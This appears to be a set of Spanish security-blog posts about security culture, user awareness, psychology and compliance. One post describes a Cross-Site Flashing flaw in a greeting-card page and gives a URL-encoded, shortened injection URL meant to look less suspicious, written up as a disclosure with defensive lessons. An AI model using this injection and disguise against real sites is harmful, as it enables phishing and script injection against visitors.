En estos momentos hay gente que se pone títulos rimbombantes para sus puestos de seguridad. Llega hasta tal absurdo que alguien ha creado el ‘generador de nombres aleatorios para títulos de seguridad de la información‘.

Desde Sevilla Sec&Beer queremos promocionar un nuevo título que pensamos es mucho más realista para los tiempos que corren y que está más de acuerdo con nuestra forma de entender la seguridad: la figura del ‘Security Comedian‘.

En la siguiente viñeta Alan Moore explica perfectamente lo que queremos transmitir.

Pues trasladándolo al mundo TIC, visto lo mal que está todo, las malas decisiones que se toman, la mala implementación, las carencias en la aplicación de medidas de seguridad y la pesada deuda tecnológica que arrastramos (lo que hay ya no se puede cambiar fácilmente), creemos que ser el Security Comedian es lo único que tiene sentido.

Si alguna vez has sentido esa sensación de cámara oculta y has dicho “es coña, ¿no?” ante alguna situación de (in-)seguridad… es que hay un poco de Security Comedian en ti. Ya sólo necesitas asumirlo.

Y recuerda que, en este mundo hay dos tipos de personas, los que se ponen muy serios y te intentan timar y los que se lo toman a guasa pero te intentan ayudar. Desconfía de los primeros.

 

Pues eso, “cuando un tonto coge un camino, el camino se acaba y el tonto sigue”. En este caso el tonto soy yo. La linde es la necesidad de tener en cuenta las características socio/culturales de una organización para el desarrollo de sus modelos de gestión y marcos normativos de seguridad. (Pedazo de frase pedante que me he marcado, verdad?…)

Hace unos días, mi compañero Daniel Santos (no he pedido permiso a Dani para nombrarle ni citarle, espero que no le moleste) hizo una exposición magnífica sobre los proyectos que nuestro equipo desarrolla con pena y gloria a partes iguales.

Cuando habló de aquellos proyectos relacionados con el cumplimiento normativo (el compliance que diría un señor consultor) usó una cita de la película “Gladiator”.

Marco Aurelio y Máximo Décimo conversan: “¿Y qué es Roma Máximo?” “He visto parte del resto del mundo, es brutal, cruel y oscuro, Roma es la luz”.

Dani venía a decirnos que las normas son un instrumento útil para organizarnos y que sin ellas el caos hace nuestra existencia muuuuy complicada e incómoda.  Y esto, aplícalo al código civil, al código penal, al de circulación o a las políticas de seguridad.

Como digo, en el caso de las normas o políticas de seguridad es lo mismo, son muy útiles especialmente en situaciones que nos resultan ambiguas. Para un usuario con conocimientos limitados de la tecnología, la elección de guardar sus documentos en el servidor de ficheros o en local en su portátil es completamente ambigua. Con sus conocimientos no puede evaluar los pros y contras de cada una de las dos formas de proceder y las dos le parecen conductas válidas. Si en este caso existe una norma clara que le diga que toda documentación corporativa va al servidor de ficheros y la documentación personal se queda en su carpeta de documentos locales, la situación se des-ambigua de forma inmediata.

Sin embargo…. al igual que ocurre con las metodologías de gestión de seguridad  (ver la entrada de VIC Information Security Management Mediterranean Mode), en el desarrollo de políticas de seguridad cometemos el mismo error y desarrollamos normas como si nuestros usuarios fueran luteranos alemanes o individualistas norteamericanos. Ni las políticas ni la forma de hacerlas cumplir puede ser la misma aquí que en Londres.

A continuación voy a citaros un par de fragmentos de sendos post del blog politikon, que nada tienen que ver con la gestión de la seguridad de la información, pero sí con las diferencias culturales y la aceptación y cumplimiento de normas.

El primero sobre los alemanes Esa cultura que es Alemania II, cito traduciendo:

“La afición alemana por el orden, sobre la que a menudo se hacen bromas, ha demostrado ser cierta, dijo Carlos Baixeras, de 30 años. Un ingeniero que comenzó a trabajar cerca de Frankfurt hace 18 meses. “Hay reglas para todo”, dijo. “Hay una política de uso de la papelera.”

Y otro de nuestros amigos centroeuropeos Esa cultura que es Alemania III, cito y traduzco:

“Según el diario alemán Der Spiegel, la policía alemana disparó únicamente 85 balas en todo 2011… la mayoría de estos disparos ni siquiera fueron dirigidos a personas: “49 disparos de advertencia, 36 disparos a sospechosos. 15 personas fueron heridas, 6 resultaron muertas.”

Y ahora para comparar, una de nuestros cercanos (culturalmente hablando) primos griegos, Esa cultura que es grecia, cito y aviso que es un poco largo pero merece la pena:

“Resulta que el gobierno griego, en un momento de inspiración, decidió que era hora que la gente empezara a pagar un impuesto sobre propiedades para tapar el enorme agujero fiscal del país. Es un impuesto decente, bastante progresivo; los que tienen una casa más grande cobran más, etcétera. Como el sistema de recaudación griego es una verbena, el ministro de turno decidió que el impuesto se cobraría junto con el recibo de la luz. Todo el mundo necesita electricidad, al fin y al cabo; nadie va a quedarse a oscuras con tal de evadir dinero a hacienda.

Bueno, esto es Grecia. Primero, los sindicatos protestaron, montando un pollo tremendo, organizando desobediencia civil y llevando el tributo a juicio. La gente, lisa y llanamente, prefirió dejar de pagar el recibo de la luz antes que (horror) pagar un miserable duro al gobierno. La compañía eléctrica (pública, como todo en ese país), que ya iba justa de dinero, tuvo que ser rescatada de mala manera por el gobierno ante la barbaridad de gente que sencillamente dejó de pagar por el suministro completamente. Para acabarlo de arreglar, un tribunal decretó que cortar la luz a alguien por no pagar un impuesto es ilegal, así que el gobierno ha acabado no viendo un duro del nuevo tributo y encima gastándose una millonada para cubrir las pérdidas.

La cosa, sin embargo, no se queda aquí. La eléctrica ha decidido que esto de aplicar la ley no va con ella, así que este año ni va a intentar cobrar el impuesto. El gobierno griego, como ni está ni se le espera, no ha dicho nada, así que tenemos un impuesto (otro más) que está en los libros pero que todo el mundo va a ignorar olímpicamente”

Creo que sobra que os haga la analogía con la normalización de seguridad.

¿Qué modelo de desarrollo normativo creo que puede funcionar en nuestro entorno? Os lo cuento en mi próximo post…

La triste realidad es que todo el mundo tiene vulnerabilidades de seguridad. Algunas más fáciles de descubrir, otras más difíciles. Algunas más fáciles de arreglar y otras más difíciles.

En el conocimiento y tratamiento de vulnerabilidades ocurren procesos psicológicos interesantes. Para empezar, aunque todo el mundo te diga que está muy interesado en la seguridad y en conocer sus vulnerabilidades. Sin embargo, a nadie le gusta que se conozcan sus debilidades, por lo que no siempre muestran alegría con los resultados.

Otro interesante efecto es ver la solución de las vulnerabilidades como algo complejo cuando, la mayor parte de las veces, no lo es tanto. Incluso las de desarrollo, que parecen las más complejas, tampoco es para tanto.

Por último, ya sea por falta de tiempo, recursos, conocimientos, dinero o prioridades puede ocurrir que te dé igual qué vulnerabilidades tengas porque no las vas a arreglar, de todas formas.

En definitiva, el viejo dicho de que el conocimiento os hará libres no siempre aplica y es tristemente descorazonador ver que realmente ocurre lo contrario.

He pretendido reflejar esta situación en este nuevo lunes desmotivador que, tras un cierto periodo de ausencia, vuelve para recordarnos a todos lo vulnerable que somos, queramos saberlo o no.

¿Qué es peor, la ignorancia o la indiferencia? ¿Quién lo sabe? ¿A quién le importa?

La sensación de seguridad es algo psicológico que, en muchos casos, viene erróneamente dada por la ignorancia o la indiferencia hacia este tema.

Para aquellas personas que, además, son responsables de sistemas de información, he hecho un pequeño checklist en el que resumo algunas actividades que considero que son esenciales para no sentirse completamente inseguro.

Por lo tanto, no estas seguro si…

  • Crees que no eres un objetivo para nadie
  • Nunca has sufrido una auditoría
  • Cualquiera puede saber más que tú de tus entornos con un simple nmap
  • Crees que tu [cortafuegos|WAF|IDS/IPS] te va a servir de algo
  • Te fías de tus usuarios, administradores y desarrolladores
  • Ni tú ni nadie mira los logs de tus sistemas y aplicaciones
  • Pones en producción servicios cuya seguridad no ha analizado nadie
  • Crees que el [documento de seguridad|plan de seguridad|plan de adecuación|etc.] desde tu estantería te protege automágicamente
  • Piensas que únicamente el (poco) personal de seguridad es responsable de la seguridad de tu infraestructura
  • Te sientes seguro

Por supuesto esto no es un listado completo, ¿qué más añadirías?

 

 

Hace tiempo que no escribo nada. Disculpadme, motivos personales y profesionales me tienen disperso. Algunos de estos motivos son positivos y otros no tanto. Entre los positivos (como algunos sabéis) está que me matriculé en la UNED para estudiar el grado de Psicología y he estado las últimas semanas centrado en aprobar los primeros exámenes…

Por cierto, en el último examen me encontré con otro de los miembros de nuestro selecto club de la seguridad y las cervezas… así que en la próxima quedada creo que vamos a poder discutir sobre algunos temas interesantes.

Después de este primer semestre se van confirmando mis sospechas: “el enfoque de otras disciplinas puede enriquecer mucho la gestión de la seguridad”.

Como comprenderéis, aun no tengo ni idea de psicología y solo he empezado a sumergirme en algunas de las teorías que componen este marco de estudio científico. Poco a poco voy conociendo conceptos que no puedo evitar relacionar con el día a día de la gestión de la seguridad. Si consigo disponer del tiempo suficiente trataré de compartirlos con vosotros y si algún psicólogo nos lee y ve que digo burradas que arroje luz por favor!!

El de hoy es el concepto de Indefensión aprendida:

Es un proceso que tiene lugar cuando un organismo aprende que sus respuestas y los reforzamientos son independientes, llevando al organismo a un estado de incapacidad percibida de resolver las situaciones de amenaza. La indefensión tendría lugar cuando se pierde el control de las consecuencias del propio comportamiento.

Cuando una persona o un animal se enfrentan a una amenaza o una pérdida, aparece la respuesta de estrés asociada al miedo. Si aprenden que la respuesta no es controlable y tiene lugar la indefensión aprendida, la depresión sustituye al miedo, es decir que las situaciones no controlables generan estrés.

Seguramente el vídeo del principio del post os deje más claro el concepto.

Yo me pregunto si esta teoría explica la conducta de muchos gestores TI que no hacen nada por mejorar la seguridad de sus servicios e información. Sabemos que la seguridad al 100% nunca se consigue y que aunque una organización gestione adecuadamente su seguridad se producirán incidentes. Además en muchas ocasiones los responsables TI no están formados y capacitados para una gestión integral y metodológica de la seguridad, lo que se traduce en acciones puntuales, no planificadas, artificiales y contratadas a proveedores que muestran poco interés en algo que no sea trincar el dinero y salir corriendo al próximo cliente.

En definitiva tenemos personas que dan respuestas (más o menos adecuadas) a amenazas y que perciben que los resultados siguen siendo incontrolables: continúan produciéndose incidentes. Aparece la indefensión aprendida y el miedo/acción se transforma en depresión/inacción/resignación…

Si esto es así… ¿qué sentido tiene que en cada una de las presentaciones comerciales y charlas de concienciación se siga usando el miedo para provocar la acción?

¿¿Le veis sentido o es una paja mental???

 

 

Visto qu los términos de búsqueda más empleados para llegar al blog recientemente son “santa claus borracho”, “drunk santa” y otros relacionados con la navidad, voy a seguir con el filón a ver si llegamos con más adeptos al artículo número 100 (que está muy cercano).

Hace unos días recibí una felicitación navideña de un sitio legítimo con el que tengo una relación laboral. El mensaje estaba en HTML e incluía (entre otras cosas) un enlace a la postal.

El tema de las postales (navideñas o no) siempre ha sido un vector de infección, phishing y otros peligros. Una vez casi caigo porque me llegó una felicitación de cumpleaños precisamente cerca de mi cumpleaños.

Como diría Zalewski “todo empieza con una URL”. Esta era tal que así:

http://www.example.com/x/index.php?file=navidad.swf&dear=Dr_Alce&dear_email=dr.alce@example.com&yours=Sr_Cabeza&yours_email=sr.cabeza@example.com&message=MERRY%20CHRISTMAS%20FROM%20SR.%20CABEZA!!

Que el nombre del fichero flash (swf) aparezca en la URL huele mal. Pero bueno, yo tampoco sé mucho de flash, igual es una técnica habitual.

Eché un ojo a la página que genera esta URL con el curl y me encontré lo siguiente:

<object id="naviddad" width="800" height="600" classid="clsid:d27cdb6e-ae6d-10cf-94b8-443523540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0">
<param name="allowScriptAccess" value="always" />
<param name="allowFullScreen" value="false" />
<param name="quality" value="high" />
<param name="src" value="navidad.swf?dear=Dear Dr_Alce,&amp;yours=Yours, Sr_Cabeza&amp;message=MERRY CHRISTMAS FROM SR. CABEZA!!" />
<param name="allowscriptaccess" value="sameDomain" />
<param name="allowfullscreen" value="false" />
<param name="pluginspage" value="http://www.macromedia.com/go/getflashplayer" />
<embed id="xmas_php" width="800" height="600" type="application/x-shockwave-flash" src="navidad.swf?dear=Dear Dr_Alce,&amp;yours=Yours, Sr_Cabeza&amp;message=MERRY CHRISTMAS FROM SR. CABEZA!!" allowScriptAccess="always" allowFullScreen="false" quality="high" allowscriptaccess="sameDomain" allowfullscreen="false" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>

Lamentablemente, modificando el parámetro file para que incluya otro fichero swf de otro dominio conseguimos que el sitio de destino nos incluya y ejecute el flash. Investigando un poco descubrí que a este tipo de XSS le llaman Cross-Site Flashing (XSF).

Las posibilidades, como podréis imaginar, son numerosas. Considerando, además, el hecho de que se puede ejecutar javascript desde el propio flash, ya está todo perdido :).

El problema principal, en este caso, es que la directiva allowscriptaccess aparece tres veces con dos valores distintos. El valor correcto sería el de ‘sameDomain’ donde, al menos, sólo se podría ejecutar un flash que estuviera en el mismo sitio web. Pero aparece otro (que por alguna razón prevalece) con el valor ‘always’ que significa que cargará cualquier flash de cualquier sitio.

Aunque también sería posible analizar el código flash buscando uso inseguro de los parámetros de entrada para provocar la ejecución remota.

Investigando un poco más descubrí algunos artículos interesantes sobre el tema, que enlazo a continuación.

Por cierto, el OWASP dedica el capítulo 4.8.4 de su guía de pruebas a XSF.

Como aprendizaje, tened mucho cuidado con cómo publicáis flash y tened en cuenta que el código puede leerse fácilmente y, como siempre, nunca confiéis en la entrada del usuario.

Ah, y si queréis una postal navideña, dejad un comentario con vuestras señas y os la enviamos sin compromiso :).

Actualización

Graciosamente, la URL que puedes insertar en el perámetro file puede ser una acortada (por ejemplo con bit.ly o algún sitio simialr). No puedes eliminar el esquema de la URL, que queda tela de sospechoso, pero sí puedes escribirlo ‘en URLencode’. La URL resultante puede ser la siguiente:

http://www.example.com/x/index.php?file=%68%74%74%70%3A%2F%2Fbit.ly/navidad

Que es mucho menos sospechosa.

Fuck you

Hola ¿qué tal?,

el otro día chmeee nos hablaba de concienciación de usuarios en uno de sus Lunes Desmotivadores y citaba a Ranum:

“la concienciación de usuarios no funciona ni funcionará nunca porque, de hacerlo, ya hubiera funcionado”

Ayer uno de nosotros sec&beerreros twiteaba lo siguiente:

“hoy un reputado profesional de la infosec me ha dicho “la concienciación de los usuarios es una batalla perdida” …

Pues a Ranum, al reputado profesional (desenmascarado hoy por @adaecjl) y a todo el que sostenga eso, yo le respondo “y un carajo!“. No digo que sea una batalla perdida, digo que no podemos saber si lo es. Es una batalla que nunca hemos luchado en serio.

Chmeee decía:

“Uno de los principales escollos es la falta de conocimientos del usuario normal respecto a las tecnologías que utiliza y a los riesgos que supone”.

Pues yo digo:

“Uno de los principales escollos es la falta de conocimientos de los profesionales de la infosec respecto al ser humano, a las relaciones interpersonales, a la forma en que pensamos, sentimos, aprendemos y actuamos dentro de una organización.”

Os imagináis que las campañas de seguridad vial las diseñaran los mismos ingenieros y mecánicos que diseñan los airbags, los ESPs, el ABS y las estructuras deformables???  ¿Pensáis que las campañas de prevención del tabaquismo las diseña un cirujano especializado en pulmón?  Pues esto es lo que hacemos en seguridad de la información, al menos es lo que yo he vivido.

Y hombre… los reputados profesionales de la seguridad son buenos en su campo, pero quizá no son buenos en otras áreas profesionales del terreno de las ciencias sociales. Cuando nosotros hablamos de concienciación, a un experto de este campo le debe sonar igual que cuando nosotros escuchamos a un psicólogo hablar de firma electrónica….

Si todos estamos de acuerdo en que la gestión de la seguridad se debe basar en el modelo de Personas, Procesos y Tecnología (PPT), en cualquier departamento de seguridad o proveedor de servicios de seguridad deberíamos encontrar:

  • psicólogos, sociólogos, pedagogos, expertos en comunicación y marketing, etc (Personas)
  • juristas, expertos en organización, administración y gestión empresarial, etc (Procesos)
  • Ingenieros y técnicos (Tecnología)

Por deformación profesional, cuando hablo de seguridad de la información, me refiero a seguridad de la información corporativa. Es decir, a la disciplina que trata de garantizar que la organización (ya sea empresa, administración, asociación, etc) protege su información con el fin de que la consecución de sus objetivos se cumpla con eficiencia.

En el ámbito de la seguridad corporativa y partiendo del mantra PPT la solución al problema completo únicamente la encontrará un equipo multidisciplinar.

Y ahora por 25 pesetas, díganme organizaciones con equipos de seguridad multidisciplinares. Por ejemplo  ******  un, dos, tres, responda otra vez…

 

 

Tranquilos, no tenemos un gusano metiendo spam en el blog… el título de este post está en inglés porque soy así de pedante :P. Y porque no he encontrado traducción al español para este dicho.

Hace unas semanas vimos en casa la película “The Joneses”, dejando a un lado que como película no me gustó demasiado… sí me hizo reflexionar sobre algunos aspectos de la gestión de la seguridad de la información.

Voy a fusilar parte del post de “El blog salmón” en el que aclaran de que va la película mucho mejor de lo que yo podría hacerlo (llevo un consultor dentro, lo siento):

The Joneses es una película que trata sobre una familia que llega a un barrio de ingresos medio-altos en los Estados Unidos. La familia Jones tiene todos aquellos productos que uno quiera comprar (ropa de diseño, descapotables de alta gama, electrónica, mobiliario caro, etc) y parecen ser felices, convirtiéndose en el foco de atención de sus vecinos.

Pero en realidad los Joneses no son una familia, sino empleados de una agencia de publicidad. Los coches, la ropa que llevan, la comida que compran, etc ha sido puesta ahí por la agencia de publicidad con el único objetivo de que los miembros de la familia la muestren a sus vecinos, les cuenten las bondades y estos la compren.

El apellido de la familia (Jones) está muy bien elegido porque en inglés americano existe una expresión “keeping up with the joneses” que se refiere a mantener el nivel de vida de los vecinos. Si el vecino se compra un coche nuevo hay que adquirir uno igual o superior. Si se va de vacaciones a Francia nosotros nos vamos a Italia, etc.

Un caso extremo de marketing viral. Espero que en la vida real no se acometan iniciativas tan radicales. Pero en menor grado es habitual ver a famosos promocionando productos, servicios o incluso religiones e ideas políticas de forma subliminal. Está claro que a los humanos nos funciona así el cocotero. Los judíos lo saben desde hace miles de años y el décimo mandamiento dice:

No codiciarás la casa de tu prójimo, no codiciarás la mujer de tu prójimo, ni su siervo, ni su criada, ni su buey, ni su asno, ni cosa alguna de tu prójimo.

Volviendo a la gestión de la seguridad… ¿acaso no vemos este comportamiento con frecuencia? Me explico ¿qué medidas o proyectos de seguridad acometemos? Un teórico consultor trajeado o un gestor de seguridad recién salido del cascarón y aun no ha pasado por la trinchera nos diría: “las acciones de mejora deben venir orientadas por el análisis de riesgos o por requisitos externos a la organización (ej: ENS, LOPD…)”

Pero no nos engañemos, al final usamos el sota, caballo y rey. Copiamos lo que hacen en otras organizaciones, lo que establece el mercado de la seguridad o lo que la corriente interpreta de los estándares. Y así vamos generando mantras y los vamos asumiendo. Y si mi vecino de CPD compra un cortafuegos yo compro otro pero más grande. Y si se hace un proyecto de hacking ético (todavía no sé que carajo es esto del hacking ético pero se vende de maravilla oiga) pues a mi póngame dos.

Otra reflexión que me hago es: ¿los proveedores de seguridad aprovechan esto? ¿Cuándo por ejemplo se despliega una solución piloto en una empresa y organismo líder o referente, no se busca precisamente esto??

Y por último y paro ya de divagar ¿¿¿no podríamos como gestores de seguridad aprovechar estas técnicas para hacer el bien???? ¿Qué pensáis?

“Si el ratio de cambio fuera es mayor que el ratio de cambio dentro, el fin está cerca” Jack Welch

Entonces… ¿por qué nos empeñamos en imponernos trabas y enrevesados procedimientos internos para seguridad?

Y no estoy hablando sólo de las amenazas externas a una organización sino también a los cambios que sufre la propia organización y la habilidad para reaccionar del grupo de seguridad.

Así que, os animo a pensar cómo reducir al máximo vuestras trabas y complejidades porque de lo contrario… el fin está cerca.

En algunas paradas de autobuses de la Barrosa (playa de Chiclana de la Frontera) se puede ver este cartel concienciador sobre el uso de Internet. Realmente va enfocado al uso de Internet por parte de menores y, casi todos los puntos tienen como receptor a los padres.

Aunque me gusta ver este tipo de propuestas que animan a mejorar la seguridad, tengo dudas acerca del enfoque de este cartel. Os comento lo que pienso después de la foto.

Lo primero que destaca de esta imagen es que ‘la educación es corresponsabilidad de todos/as’. No queda muy claro a qué se refiere, supongo que será parte de un programa con más contenidos y que ‘todos/as’ son los padres (a diferencia de otras fuentes de educación del niño: la tele, profesores, la internet…).

Por otro lado, como ya decía, el enfoque de casi todas las líneas son los padres de la criatura, aunque eso no queda claro en el título. Hecho en falta que se dirija algún mensaje a los jóvenes, al fin y al cabo, parece que es el grupo objetivo.

Respecto a los consejos, la mayoría puede resumirse en ‘hable y establezca una relación de confianza con sus hijos para que no hagan cosas en las redes sociales que usted no sepa y que puedan ser malas para ellos‘. Pero bueno, digamos que eso podría aplicar a cualquier otra situación de la relación con los hijos y no específicamente en el ámbito del uso de internet / redes sociales.

Hay dos entradas, sin embargo, que parecen dirigidas al padre y que no hacen relación a los hijos, que son:

  • Tenga cuidado con el e-mail y los archivos adjuntos, cuando no conoce quién lo envia. Nunca abra correos sospechosos.
  • Evite las páginas con contenidos nocivos o falsos. No crea todo lo que encuentre, vea o lea en Internet.

El primero indica precaución, aunque no advierte que, aunque sea de un ‘conocido’ también conviene tener precaución. Esos mensajes con sólo un adjunto o una URL que vienen de tu amigo… igual no es él. Además, la coma sobra.

Respecto a evitar páginas nocivas o falsas… sin comentario :). El consejo de incredulidad siguiente, creo que debe aplicarse no sólo a Intenet, aunque no me parece mal recordarlo.

En definitiva, que no quiero perder más tiempo con esto que no deja de ser anecdótico: concienciar usuarios es complicado y no creo que este cartel esté muy bien enfocado, aunque no me parece mal que se vayan dando mensajes porque, al final, algo quedará.

El asunto de que los chavales no se metan en líos en Internet y en las redes sociales (ese invento de la CIA) no deja de ser el mismo que fuera y no me parece que esté tan relacionado con ‘uso seguro de Internet’.